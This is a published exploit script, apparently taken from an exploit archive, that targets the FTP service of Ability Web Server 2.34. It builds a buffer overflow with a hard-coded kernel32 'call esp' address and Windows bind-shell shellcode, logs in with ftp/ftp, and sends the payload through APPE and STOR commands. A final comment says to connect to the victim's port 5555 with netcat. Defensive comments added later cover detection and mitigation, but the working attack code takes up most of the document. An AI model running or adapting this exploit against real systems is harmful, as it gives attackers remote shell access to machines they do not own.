Ability Web Server(ftp) - Remote Buffer Overflow Exploit



EKU-ID: 3705 CVE: OSVDB-ID:
Author: JoKeR_StEx Published: 2013-12-16 Verified: Verified


#!/usr/bin/python 
#====================================================
# Exploit Title : Ability Web Server(ftp) Remote Buffer Overflow Exploit
# Author : JoKeR_StEx
# Version : 2.34
# <3 Algeria <3  
#====================================================
  
import socket,sys
  
# Usage banner. Python 2 print-statement syntax; it is printed on every run,
# before the command-line arguments are read further down.
print"[+] Usage : exploit.py <ip> <port(21)> \r\n"
  
# Filler placed in front of the 4-byte value below (see the concatenation
# into `buffer`). Presumably 969 is the distance to the saved return address
# in the 2.34 build named in the header -- not verifiable from this page.
junk="A" * 969
# 32 bytes of 0x90 (x86 NOP) placed between the 4-byte value and the payload.
nop = "\x90" * 32
# Author's label: the address of a `call esp` instruction in kernel32.dll.
# Defender note: a hard-coded absolute address inside a system DLL only holds
# for one specific DLL build loaded at a fixed base. ASLR and a non-executable
# stack (DEP) are the platform mitigations aimed at this class of technique.
eip="\x7C\x83\x69\xF0" # call esp 7C8369F0 kernel32.dll
# Payload, as labelled by the author on the next line. The bytes are not
# decoded here. Taken at face value, a bind-shell payload means the host-side
# indicator is a new TCP listener on port 5555 owned by the FTP service
# process or a child of it, so unexpected listeners are worth alerting on.
#Shellcode => windows/shell_bind_tcp LPORT=5555 size=>368
shellcode = ("\xda\xd0\xd9\x74\x24\xf4\x5e\x2b\xc9\xb1\x56\xbf\x9d\x28" 
"\xd0\x22\x83\xee\xfc\x31\x7e\x14\x03\x7e\x89\xca\x25\xde" 
"\x59\x83\xc6\x1f\x99\xf4\x4f\xfa\xa8\x26\x2b\x8e\x98\xf6" 
"\x3f\xc2\x10\x7c\x6d\xf7\xa3\xf0\xba\xf8\x04\xbe\x9c\x37" 
"\x95\x0e\x21\x9b\x55\x10\xdd\xe6\x89\xf2\xdc\x28\xdc\xf3" 
"\x19\x54\x2e\xa1\xf2\x12\x9c\x56\x76\x66\x1c\x56\x58\xec" 
"\x1c\x20\xdd\x33\xe8\x9a\xdc\x63\x40\x90\x97\x9b\xeb\xfe" 
"\x07\x9d\x38\x1d\x7b\xd4\x35\xd6\x0f\xe7\x9f\x26\xef\xd9" 
"\xdf\xe5\xce\xd5\xd2\xf4\x17\xd1\x0c\x83\x63\x21\xb1\x94" 
"\xb7\x5b\x6d\x10\x2a\xfb\xe6\x82\x8e\xfd\x2b\x54\x44\xf1" 
"\x80\x12\x02\x16\x17\xf6\x38\x22\x9c\xf9\xee\xa2\xe6\xdd" 
"\x2a\xee\xbd\x7c\x6a\x4a\x10\x80\x6c\x32\xcd\x24\xe6\xd1" 
"\x1a\x5e\xa5\xbd\xef\x6d\x56\x3e\x67\xe5\x25\x0c\x28\x5d" 
"\xa2\x3c\xa1\x7b\x35\x42\x98\x3c\xa9\xbd\x22\x3d\xe3\x79" 
"\x76\x6d\x9b\xa8\xf6\xe6\x5b\x54\x23\xa8\x0b\xfa\x9b\x09" 
"\xfc\xba\x4b\xe2\x16\x35\xb4\x12\x19\x9f\xc3\x14\xd7\xfb" 
"\x80\xf2\x1a\xfc\x33\xb0\x92\x1a\x51\xa6\xf2\xb5\xcd\x04" 
"\x21\x0e\x6a\x76\x03\x22\x23\xe0\x1b\x2c\xf3\x0f\x9c\x7a" 
"\x50\xa3\x34\xed\x22\xaf\x80\x0c\x35\xfa\xa0\x47\x0e\x6d" 
"\x3a\x36\xdd\x0f\x3b\x13\xb5\xac\xae\xf8\x45\xba\xd2\x56" 
"\x12\xeb\x25\xaf\xf6\x01\x1f\x19\xe4\xdb\xf9\x62\xac\x07" 
"\x3a\x6c\x2d\xc5\x06\x4a\x3d\x13\x86\xd6\x69\xcb\xd1\x80" 
"\xc7\xad\x8b\x62\xb1\x67\x67\x2d\x55\xf1\x4b\xee\x23\xfe" 
"\x81\x98\xcb\x4f\x7c\xdd\xf4\x60\xe8\xe9\x8d\x9c\x88\x16" 
"\x44\x25\xb8\x5c\xc4\x0c\x51\x39\x9d\x0c\x3c\xba\x48\x52" 
"\x39\x39\x78\x2b\xbe\x21\x09\x2e\xfa\xe5\xe2\x42\x93\x83" 
"\x04\xf0\x94\x81");
# Trailing padding appended after the payload.
rest="C" * 627
# The command argument: 969 + 4 + 32 + payload + 627 bytes, i.e. 2000 bytes
# if the payload is 368 bytes as the author labels it.
# Defender note: an FTP command argument of this size, containing
# non-printable bytes, is far outside any plausible file name. A length limit
# on command arguments at an FTP-aware proxy or IDS covers this traffic
# without needing a signature for the specific payload.
buffer = junk + eip + nop + shellcode + rest
# Connection 
# NOTE(review): this block is kept exactly as published (Python 2 syntax); it
# has not been run or corrected here. The comments describe what the listing
# is written to do, not verified behaviour.
# Target address and port come straight from the command line with no
# validation; the port is only converted with int() at connect time.
host = sys.argv[1]
port = sys.argv[2]
# Plain TCP socket to the FTP control port.
dz=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
dz.connect((host,int(port)))
# Read and echo the server banner (at most 1024 bytes per recv).
data=dz.recv(1024)
print "[+]" + data
# Log in with the hard-coded account ftp/ftp before sending anything
# oversized. This suggests the affected commands are handled only after login
# -- confirm against the server. If so, removing or restricting that account
# narrows who can reach them.
dz.send("USER ftp\r\n")
data=dz.recv(1024)
print"[+]" + data 
dz.send("PASS ftp\r\n")
data=dz.recv(1024)
print"[+]" + data
# The oversized buffer built above is attached to an APPE command.
# Detection: in FTP server logs or on the wire, a login as "ftp" followed by
# an APPE/STOR whose argument is about 2000 bytes, then a service crash or
# restart, is the sequence to look for.
# Remote Buffer File 
dz.send("APPE" + buffer + "\r\n"
data=dz.recv(1024)
print"[+]" + data
# The same buffer is attached to a STOR command.
#STOR(save) buffer 
dz.send("STOR" + buffer + "\r\n")
data=dz.recv(1024)
print"[+]" + data
# Status message printed after both sends, just before the socket is closed.
print"[+]"+"Sending Shellcode ..." 
dz.close()
# Mitigation note: this page names version 2.34 but gives no CVE/OSVDB id and
# no fixed release. Check with the vendor for an update, or take the FTP
# service off untrusted networks.
# Cennect To Victim  " nc -nvv <ip victim > 5555
################################################
#The Black Devils ,Team Dz S.O.S
#Sec W0rms 
#L0ve Algeria <3 Security <3 Penetration Testing
################################################